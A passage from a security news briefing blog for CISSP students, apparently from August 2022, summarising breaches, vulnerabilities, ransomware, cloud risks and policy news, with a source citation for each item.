From there, though, the gang were able to get VPN access into the company and pivot to domain controllers and Citrix servers, where they exfiltrated more data and installed their tools in an attempt to persist. Despite being evicted, the attackers kept trying to return - Cisco claims, unsuccessfully. No ransomware was installed, but the threat actor's behaviour suggests that would have been one of their next steps if not discovered.

Biasini, Nick, Cisco Talos shares insights related to recent cyber attack on Cisco, Cisco Talos, 10 August 2022. Available online at https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html.

Gatlan, Sergiu, Cisco Hacked by Yanluowang ransomware gang, 2.8 GB allegedly stolen, Bleeping Computer, 10 August 2022. Available online at https://www.bleepingcomputer.com/news/security/cisco-hacked-by-yanluowang-ransomware-gang-28gb-allegedly-stolen/.

5G IoT API's a Disaster Waiting to Happen

One of the benefits of 5G is to move IoT devices off domestic and SME wi-fi networks, where they have to punch holes through NATting routers, onto a high-bandwidth, but - more importantly - low latency cellular network which will allow direct management. In a presentation at Black Hat, Technical University of Berlin researcher Altaf Shaik says that the IoT API's of 10 mobile carriers he examined share common, but serious, vulnerabilities which could allow unauthorised access to data or even direct access to devices on the 5G network.

The 5G standards do not define IoT service platforms, and so a plethora of new protocols have sprung up, many designed by telcos with limited experience in this area. The results include weak authentication and a lack of access controls which can reveal customer data, access to data streams or even direct access to devices via simple replay attacks.

Newman, Lily May, One of 5G's Biggest Features Is a Security Minefield, Wired, 9 August 2022. Available online at https://www.wired.com/story/5g-api-flaws/.

Threat Actors Shift Left

The automation and orchestration of the development and deployment process - generally labeled CI/CD (Continuous Integration / Continuous Deployment) has introduced vulnerabilities which attackers are now exploiting, according to two speakers at Black Hat. In their talk, RCE-as-a-Service: Lessons Learned from 5 Years of Real-World CI/CD Pipeline Compromise, Iain Smart and Viktor Garzdag provide examples of common vulnerabilities in these pipelines:

  • Hardcoded credentials in version control systems and source control management
  • Over-permissive roles
  • Lack of audit, monitoring and alerting

Traditional, on-prem, software development practices were largely secure by virtue of being well inside the enterprise network. Now that source is in shared, cloud-hosted, repositories, along with all the test scripts, manifests and deployment tools that push them into production, they need a lot more attention from security professionals. Even for on-prem deployment, the COVID-19-inspired shift to hybrid work means that developers are often working with cloud-hosted tools. In short, DevOps must become DevSecOps or even SecDevOps.

Seals, Tara, Software Development Pipelines Offer Cybercriminals 'Free-Range' Access to Cloud, On-Prem, Sark Reading, 10 August 2022. Available online at https://www.darkreading.com/application-security/software-development-pipelines-cybercriminals-free-range-access-cloud-on-prem.

Amazon Expands Biometric Payments

Retail giant Amazon is expanding the use of its Amazone One palm print scanning checkout system to 65 Whole Foods stores across California. The system is contactless, reducing the risks of infection; the user can simply hold their hand, palm down, above the scanner. The scheme has, perhaps inevitably, drawn the ire of privacy advocates. - which Amazon has countered by simply offering customers a $10 credit to register for the system.

Axon, Samuel, Amazon begins large-scale rollout of palm print-based payments, Ars Technica, 11 August 2022. Available online at https://arstechnica.com/gadgets/2022/08/amazon-begins-large-scale-rollout-of-palm-print-based-payments/.

Multiple VMware Vulnerabilities

In an advisory, VMware warns of multiple vulnerabilities which will allow privilege escalation, information disclosure and authentication bypass.

Uncredited, Advisory VMSA-2022-0022, 9 August 2022. Available online at https://www.vmware.com/security/advisories/VMSA-2022-0022.html.

CISA Vulnerability Summary

The US Cybersecurity & Infrastructure Security Agency has released its weekly vulnerability summary for the first week of August. Well worth a look, albeit depressing - it really has something for everyone.

CISA, Vulnerability Summary for the Week of August 1, 2022. Available online at https://www.cisa.gov/uscert/ncas/bulletins/sb22-220.

COVID Contact App Finally Scrapped

After over two years, $A21 million and yet only two cases identified, the Australian government has finally canned its much-reviled COVIDSafe contact-tracing app. Many experts - your humble scribe included - warned that the app was an incredibly bad idea, largely due to the vagaries of Bluetooth antenna patterns, the likelihood of false positives from people passing on the other side of walls and windows, power consumption, the inverse square law and many other problems, but a previous government minister with little understanding of, and far too much faith in, technology pressed ahead regardless. As the old saying has it, if you think technology will solve your problem, then you don't understand technology and you don't understand your problem.

No-one will mourn its passing; First Dog on the Moon perhaps said it best:


Black, Jessica, The COVIDSafe app is dead - but was it ever really alive?, ABC News, 10 August 2022. Available online at https://www.abc.net.au/news/2022-08-10/covidsafe-app-scrapped-what-went-wrong/101317746.


These news brief blog articles are collected at https://www.lesbell.com.au/classroom/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/classroom/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

[ Modified: Thursday, August 11, 2022, 9:39 AM ]
 
by Les Bell - Wednesday, August 10, 2022, 10:21 AM
Anyone in the world

News Stories

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

Intel APIC Vulnerability Breaks Crypto

A couple of security students from Rome and Graz, Austria, have discovered a vulnerability in Intel's SGX security archicture which will leak information via uninitialized memory reads - a variation on the classic Time of Check/Time of Use class of vulnerabilities.

The SGX architecture is intended to protect sensitive data such as encryption keys in memory by the creation of secure memory blocks called enclaves. The proof-of-concept exploit uses a vulnerability in the Advanced Programmable Interrupt Controller to access stale data in registers and thereby break SGX, obtaining a 128-bit AES key in 1.35 seconds with 94% success rate. It can alse extract a 1024-bit RSA key (but who uses those?) in an average of 81 seconds with a 74% success rate.

The lesson here? The complexity of modern CPU's is making it impossible to make guarantees about security. For some years, the use of formal methods in hardware design had made the possible, but for the last 5 years or so, we have seen the growth of CPU vulnerabilities like Spectre, Meltdown and others which created sidechannel attacks, and now ÆPIC. As we have long known, the enemy of security is complexity.

Goodin, Dan, SGX, Intel's supposedly impregnable data fortress, has been breached yet again, Ars Technica, 10 August 2022. Available online at https://arstechnica.com/information-technology/2022/08/architectural-bug-in-some-intel-cpus-is-more-bad-news-for-sgx-users/.

WIndows 11 Crypto Bug Corrupts Data

A newly-discovered bug in Windows 11 affects systems using AES-XTS and AES-GCM encryption modes on Intel Ice Lake, Tiger Lake, Rocket Lake and Alder Lake processors. Let's break this down.

AES-XTS is XEX-based tweaked codebook mode with ciphertext stealing (I won't delve further into this, but it's something I cover in a forthcoming course on crypto for developers), and is primarily used for encrypted filesystems such as Bitlocker, Veracrypt, etc. AES-CGM is much more common - it's the Galois Counter Mode used by the majority of TLS connections on the web.

The processor architectures listed cover some of Intel's 10th-generation laptop processors, as well as all their 11th- and 12th-geeration Core CPU's. AMD's as yet un-released Zen 4 processors will also support the VAES (Vector AES) instructions which underlie the problem.

Microsoft introduced a patch for the problem in the June 2022 security update package for Windows 11 and Windows Server 2022. If you have deployed this patch, you will not be hit with the data corruption problem - but systems running before this may have as-yet-undetected corrupted data - most likely in encrypted filesystems. Clearly, the fix should be applied ASAP. The first version of the patch caused performance degradation, probably because it disabled hardware crypto acceleration. The July 2022 version should remedy this, however.

Unattributed, KB5017259 - Windows devices that have the newest supported processors might be susceptible to data damage, Microsoft Windows support, August 2022. Available online at https://support.microsoft.com/en-us/topic/kb5017259-windows-devices-that-have-the-newest-supported-processors-might-be-susceptible-to-data-damage-d5e7c0cb-6e0a-4865-81ed-c82e91657a24.

Cisco Small Business Routers - Update Urgently

Cisco has disclosed multiple vulnerabilities in their Small Business RV160, RV260, RV340 and RV345 series routers, which can allow a remote code execution (RCE) by an unauthenticated remote threat attacker, or simply trigger a denial of service. There are no workarounds - the only fix is a software update.

You know what to do.

Uncredited, Cisco Small Business RV Series Routers Vulnerabilities, Cisco Security Advisory, 3 August 2022. Available online at https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR.

A New Form of Steganography

The classic approach to steganography was the use of milk, urine and other substances as an invisible ink which would reveal a message when heated over a candle. Now, scientists at the University of Texas at Austin have put a twist on this by storing a 256-bit encryption key into a polymer material made up of sequence-defined polymers - basically long chains of polymers, each of which corresponds to one of 16 different symbols, which they then incorporated into a special ink.

Ouelette, Jennifer, Scientists hid encryption key for Wizard of Oz text in plastic molecules, Ars Technica, 9 August 2022. Available online at https://arstechnica.com/science/2022/08/scientists-encoded-the-wizard-of-oz-in-the-chemical-structure-of-ink/.

Customer Engagement Firm Twilio Breached

Twilio, which provides mass marketing, email and customer communications services, had several employees fall victim to a smishing attack, which gained an as-yet-unidentified threat actor access to some of the company's internal systems. The SMS messages looked credible, taking employees to what looked like Twilio's SSO sign-in page hosted at fake domains.

This illustrates a weakness in using federated identity management systems hosted by external providers - they take the employee out of the company domain to one they don't really take notice of, in order to sign in. The best additional layer of defence is multi-factor authentication - and a text-message-based mTAN is emphatically not the right approach here!

Uncredited, Incident Report: Employee and Customer Account Compromise - August 4, 2022, Twilio Security Blog, 7 August 2022. Available online at https://www.twilio.com/blog/august-2022-social-engineering-attack.

Nice Doggy - Now Roll Over

A few weeks ago, a video of a robot dog firing a machine gun went viral:

If this has been giving you sleepless nights, take comfort from the fact that the robot killer canine is just as vulnerable as your garage door opener - a kill signal sent over a 433 MHz channel will instantly disable the dog. You can use any of many devices, such as a Flipper Zero, to send the signal; if you aren't familiar with these, ask your friendly local car thief.

Gault, Matthew, Hacker Finds Kill Switch for Submachine Gun-Wielding Robot Dog, Vice, 8 August 2022. Available online at https://www.vice.com/en/article/akeexk/hacker-finds-kill-switch-for-submachine-gun-wielding-robot-dog.


These news brief blog articles are collected at https://www.lesbell.com.au/classroom/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/classroom/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

[ Modified: Thursday, August 11, 2022, 4:21 PM ]
 
by Les Bell - Tuesday, August 9, 2022, 9:58 AM
Anyone in the world

News Stories

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

Targeted Ransomware Attacks on South Korea

South Korean manufacturing, pharmaceutical and healthcare companies are being targeted by Linux and Windows ransomware which will lock up files including VMware ESXi virtual machines. The GiswinLocker ransomware is produced by an otherwise-unidentified threat actor with a good knowledge of South Korean business - the attacks occurred on Korean public holidays and in the early hours of the morning. "Gwisin" means "ghost" in Korean.

The ransom note text files left behind include a lot of very specific information, including the victim company name and the types of data stolen, indicating a highly targeted attack.

Toulas, Bill, New GwisinLocker ransomware encrypts Windows and Linux ESXi servers, Bleeping Computer, 6 August 2022. Available online at https://www.bleepingcomputer.com/news/security/new-gwisinlocker-ransomware-encrypts-windows-and-linux-esxi-servers/.

Cheat Sheet Maps MITRE ATT&CK to Google Cloud Platform

MSSP Expel is offering a mind map cheat sheet which maps the MITRE ATT&CK framework to the services and API calls a threat actor would use at each stage of an attack in Google Cloud Platform. The 18-page map is useful to SOC analysts for incident response triage and investigations as well as to security architects designing instrumentation for SOAR.

It wouldn't be too difficult to re-map this approach to other cloud platforms like AWS and Azure. It's not a playbook, but a very useful adjunct.

Pellett, Kyle, A defender's MITRE ATT&CK cheat sheet for Google Cloud Platform (GCP), Expel Inc, 5 August 2022. Available online at https://expel.com/blog/mitre-attack-cheat-sheet-for-gcp/ (registration required for download).

Fixing Open Source Vulnerabilities At Scale

The fact that thousands of open source projects firstly, are open source and secondly, are hosted on public repositories like GitHub make it possible to use search tools like GitHib's code query language, CodeQL, to find common vulnerabilities across many projects and automate their reporting and fixing. Jonathan Leitschuh, inaugural Dan Kamitsky Fellow at HUMAN Security, has used his fellowship year to work on refining tools and methods for this process, and will be delivering a presentation on it at Black Hat in Las Vegas this week.

Given that open source components permeate not just the open source culture but also vast swathes of the proprietary code ecosystem, vulnerabilities in them can be devastating, as we have seen with the notorious Log4J vulnerability. This research could well have a massive payoff.

Chickowski, Ericka, We Have the Tech to Scale Up Open Source Vulnerability Fixes - Now It's Time to Leverage It, Dark Reading, 9 August 2022. Available online at https://www.darkreading.com/dr-tech/we-have-the-tech-to-scale-up-open-source-vulnerability-fixes-now-it-s-time-to-leverage-it.

Insurer Found Not Liable for Ransomware Remediation

The Federal Court of Australia has delivered a judgement in favour of the insurer in Inchcape Australia Limited v Chubb Insurance Australia Limited [2022] FCA 883. Inchcape had suffered a ransomware attack which had encrypted its primary server, deleted the primary and offsite (!?!) backups, spread to client machines and exfiltrated data, and had claimed for the costs of incident response and forensic investigations, the costs of replacing hardware, data recovery and the additional manpower requirements.

Their policy with Chubb had three separate agreements covering 1, computer systems fraud in general, 2, direct financial loss from computer virus and similar programs, and 3, direct financial loss resulting from the fraudulent modification of electronic data, electronic media or electronic instruction.

The case primarily hinged on whether the expression "direct financial loss resulting directly from" in the latter two agreements would include the incident response costs, hardware replacement, etc. or be limited to just the cost of actually reproducing the lost data, etc.

I have simplified this substantially - Justice Jagot's judgement lays out the questions in much greater detail. The reasoning is very restricted to the specific policy and circumstances, but is a useful reminder to have your corporate counsel review the fine print of your insurance policies. In particular, be aware that cyber insurance policies are designed to provide specific incident response expertise and covers those costs - what Inchcape had was a more general - but tightly worded - policy to cover the costs of data recovery only.

Inchcape Australia Limited v Chubb Insurance Australia Limited [2022] FCA 883, Federal Court of Australia, 1 August 2022. Available online at https://www.austlii.edu.au/cgi-bin/viewdoc/au/cases/cth/FCA/2022/883.html.

Danish 7-Eleven Stores Closed Due to POS Attack

7-Eleven stores throughout Denmark were closed on Monday, due to an early-morning cyber attack on their checkout and point-of-sale systems.

There's a business continuity planning challenge here: keeping an old-fashioned cash register on hand is not going to be any use; since COVID-19 struck, almost everyone uses cashless, contactless, payment these days - in fact, credit cards are less used than smartphone payment systems.

Abrams, Lawrence, 7-Eleven stores in Denmark closed due to a cyberattack, Bleeping Computer, 8 August 2022. Available online at https://www.bleepingcomputer.com/news/security/7-eleven-stores-in-denmark-closed-due-to-a-cyberattack/.

Incident Response Delay Comes Back to Bite Experian

Credit reference company Experian suffered a major breach in July, due to really bad design of its account recovery processes. It appears that customers could regain access to locked accounts by simply recreating them on a different email address, using their name, address, phone number, social security number and answering a few questions based on publicly-available information.

Experian's real problem was that a couple of customers contacted security blogger Brian Krebs, who set out to replicate their experience and investigate further, publishing his findings. At this point, a major vulnerability was now public knowledge, but rather than moving rapidly to fix it, Experian downplayed the problem and claimed that additional controls would prevent account hijacking. Unfortunately, this was incorrect, and a number of people had their accounts hijacked.

Experian is now facing a class action for their failure to fix this issue, with the filing quoting liberally from the KrebsonSecurity article. It is doubtful if much will result from this, but it does illustrate the need to move quickly to really address vulnerability disclosure, rather than relying on crisis communications to manage public sentiment.

Krebs, Brian, Class Action Targets Experian Over Account Security, KrebsOnSecurity, 5 August 2022. Available online at https://krebsonsecurity.com/2022/08/class-action-targets-experian-over-account-security/.

Amazon Acquired iRobot - Here's Why

Last week, retail giant Amazon acquired iRobot Corp., maker of the best home appliance ever, the Roomba (as well as various other mopping, gutter-cleaning and other gizmos). Although Amazon does use Roomba-like gadgets in its warehouses (as does IBM, for temperature monitoring in the aisles of its data centers), and iRobot is a profitable business with lots of growth potential, these are perhaps not the real motivation for the acquisition.

It's about mapping the inside of your home. Amazon has big designs on being a smart-home company; its Echo smart speakers outsell their rivals, in part due to low pricing which Amazon will recoup through the devices' ability to directly order products from the company with minimal user effort. These smart speakers support a smart home ecosystem that can interact with lighting, security cameras, thermostats and much more. The company also sells tablets and streaming services, and has acquired grocery retailer Whole Foods, doorbell manufacturer Ring and wi-fi device manufacturer Eero.

But until now, Amazon hasn't known exactly where these gadgets were. Now, mapping data from the Roomba meandering from room to room will tell the company the size of your home, the layout of the rooms, the furniture layout, and much more. It's going to be interesting to see how privacy advocates and legislators respond to this.

Webb, Alex, Amazon's Roomba Deal Is Really About Mapping Your Home, Bloomberg, 6 August 2022. Available online at https://www.bloomberg.com/news/articles/2022-08-05/amazon-s-irobot-deal-is-about-roomba-s-data-collection.


These news brief blog articles are collected at https://www.lesbell.com.au/classroom/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/classroom/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

[ Modified: Tuesday, August 9, 2022, 10:16 AM ]
 
by Les Bell - Sunday, August 7, 2022, 12:20 PM
Anyone in the world

News Stories

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

Local Privilege Escalation Vuln in Kaspersky VPN Client

A vulnerability in Kaspersky's VPN Secure Connection for Microsoft Windows will allow an already-authenticated user to gain SYSTEM privilege on the victim's computer. While no exploits for CVE-2022-2735 have been seen in the wild, customers should update to version 21.6 or later.

Seals, Tara, High-Severity Bug in Kaspersky VPN Client Opens Door to PC Takeover, Dark Reading, 5 August 2022. Available online at https://www.darkreading.com/endpoint/high-severity-bug-kaspersky-vpn-client-pc-takeover.

Phishers Exploit Unvalidated Redirects on Amex and Snapchat Sites

The problem of unvalidated redirects and forwards in web server code has been known about since - well, since soon after CGI code first ran on web servers. Yet it continues to catch out many developers and their sites' users, most recently a campaign which was active for over two and a half months, and targeted American Express - who fixed the problem - and Snapchat, which remains vulnerable. Similar attacks have previously targeted Fedex and Microsoft.

Kay, Roger, Phishers Bounce Lures Off Unprotected Snapchat, Amex Sites, INKY Email Security Blog, 3 August 2022. Available online at https://www.inky.com/en/blog/phishers-bounce-lures-off-unprotected-snapchat-amex-sites.

5.4 Million Twitter Accounts Compromised

Not the highest-impact social media breach by a long shot, but Twitter has confirmed that a threat actor used a zero-day exploit to gather the profiles of 5.4 million Twitter users, including verified phone numbers and email addresses, screen names, login name, location and other information. The hacker subsequently sold this data dump to two different interested parties.

While much of this information was public anyway, it may have exposed personal information of users who had pseudonymous accounts for privacy reasons. It also seems likely that the information could be used by the purchasers to run highly-targeted spear-phishing attacks. Twitter recommends that users who may be affected - or suspect they may be affected - should enable multi-factor authentication on their accounts.

Abrams, Lawrence, Twitter confirms zero-day used to expose data of 5.4 million accounts, Bleeping Computer, 5 August 2022. Available online at https://www.bleepingcomputer.com/news/security/twitter-confirms-zero-day-used-to-expose-data-of-54-million-accounts/.

Cloud Billing Risk: Recursive Serverless Functions

I'm almost certain you never foresaw this particular risk: the possibility that a recursive function, running on a serverless cloud platform, could rapidly consume massive amounts of resources before any budget alert could fire to warn you of what's happening. Cloud developers are reporting horror stories on all the major cloud platforms - AWS, Azure and Google Cloud Platform - with one developer burning through $US72,000 in a few hours while exploring and testing.

OK, this isn't strictly security, but it's a big risk and probably worth passing on to your development teams. It's one thing to screw up and max out CPU and memory on your own development workstation - it's quite another to do it on a pay-as-you-go platform that can automagically scale up to consume an entire cloud.

Losio, Renato, Are Recursive Serverless Functions the Biggest Billing Risk on the Cloud?, InfoQ, 6 August 2022. Available online at https://www.infoq.com/news/2022/08/recursive-serverless-functions/.

Traffic Light Protocol Updated to Version 2.0

The Traffic Light Protocol, which governs the dissemination of threat intelligence, has seen its first significant update. The colour WHITE has been replaced by CLEAR (to avoid racial and ethnic overtones as well as the connotation of white being an additive mix of all the other colours) and a new marker, TLP:AMBER+STRICT, has been added. So there are now five levels:

  • TLP:RED - for the eyes and ears of individual attendees only; you can act on information but not forward it; used when information cannot be effectively acted upon without significant risk for the privacy, reputation or operations of the organizations involved.
  • TLP:AMBER+STRICT - may be shared within recipient's organization only but cannot be shared with customers, business partners or suppliers
  • TLP:AMBER - may be shared within the recipient's organization and also with customers or clients
  • TLP:GREEN - may be circulated freely within your community (which if not otherwise defined is the cybersecurity/defence community), but not publicly nor outside the community
  • TLP:CLEAR - may be freely shared with the world

FIRST, TRAFFIC LIGHT PROTOCOL (TLP): FIRST Standards Definitions and Usage Guidance - Version 2.0, August 2022. Available online at https://www.first.org/tlp/.

Boards Now On Board with Security?

Not quite, not yet. According to a global survey report released by executive recruitment firm Heidrick and Struggles, only 12% of CISO's actually sit on the board of their company, but the situation is improving, in part due to market regulators like the SEC, ASIC and stock markets themselves. Gartner now predicts that 40% of boards will have a dedicated cybersecurity committee overseen by a qualified board member by 2025.

However, growing awareness of cybersecurity incidents and breaches by the board requires a change in approach, as they become inured to 'the sky is falling' pitches for budget increases. By now, many firms have lived through ransomware and other attacks and recovered to resume business as usual. A more measured approach is required to dealing with cybersecurity risks.

Aiello, Matt, et. al., 2021 Global Chief Information Security Officer (CISO) Survey, Heidrick & Struggles, 2022. Available online at https://www.heidrick.com/en/insights/technology-officers/2021-global-chief-information-security-officer-ciso-survey.

Glover, Claudia, Cybersecurity on the board: How the CISO role is evolving for a new era, Tech Monitor, 5 August 2022. Available online at https://techmonitor.ai/technology/cybersecurity/ciso-on-the-board.

IoT Device SSH Servers Used to Form Botnet

A derivative of the Mirai botnet named RapperBot has been rapidly evolving since first discovered back in June, The malware scans IoT devices and attempts to brute-force its way into the embedded SSH server, and has now amassed over 3,500 IP addresses it uses for this purpose. Once it has broken into a device it exfiltrates valid credentials back to its C2 network, and since mid-July, it has switched from propagating further to maintaining remote access into the compromised devices, adding its own public key to the authorized_keys file on the victim. In a nasty twist, it also deletes the existing public keys, which will prevent administrators logging in to fix the issue.

Lakshamanan, Ravie, New IoT RapperBot Malware Targeting Linux Servers via SSH Brute-Forcing Attack, The Hacker News, 6 August 2022. Available online at https://thehackernews.com/2022/08/new-iot-rapperbot-malware-targeting.html.

Weapons Systems Increasingly Complex, Increasingly Vulnerable

As high-tech weapons systems become more complex, relying on networked digital components, they are increasingly difficult to secure. An opinion piece in The Hill calls attention to the need to address the national security risk posed by vulnerabilities in weapons systems ranging from the B2 Spirit bomber, through tactical radio systems down to the engine and transmission controllers of ground combat vehicles.

Gates, Alexander, US strategic advantage depends upon addressing cybersecurity vulnerabilities of weapon systems, The Hill, 6 August 2022. Available online at https://thehill.com/opinion/cybersecurity/3591153-us-strategic-advantage-depends-upon-addressing-cybersecurity-vulnerabilities-of-weapon-systems/.


These news brief blog articles are collected at https://www.lesbell.com.au/classroom/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/classroom/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

[ Modified: Monday, August 8, 2022, 10:32 AM ]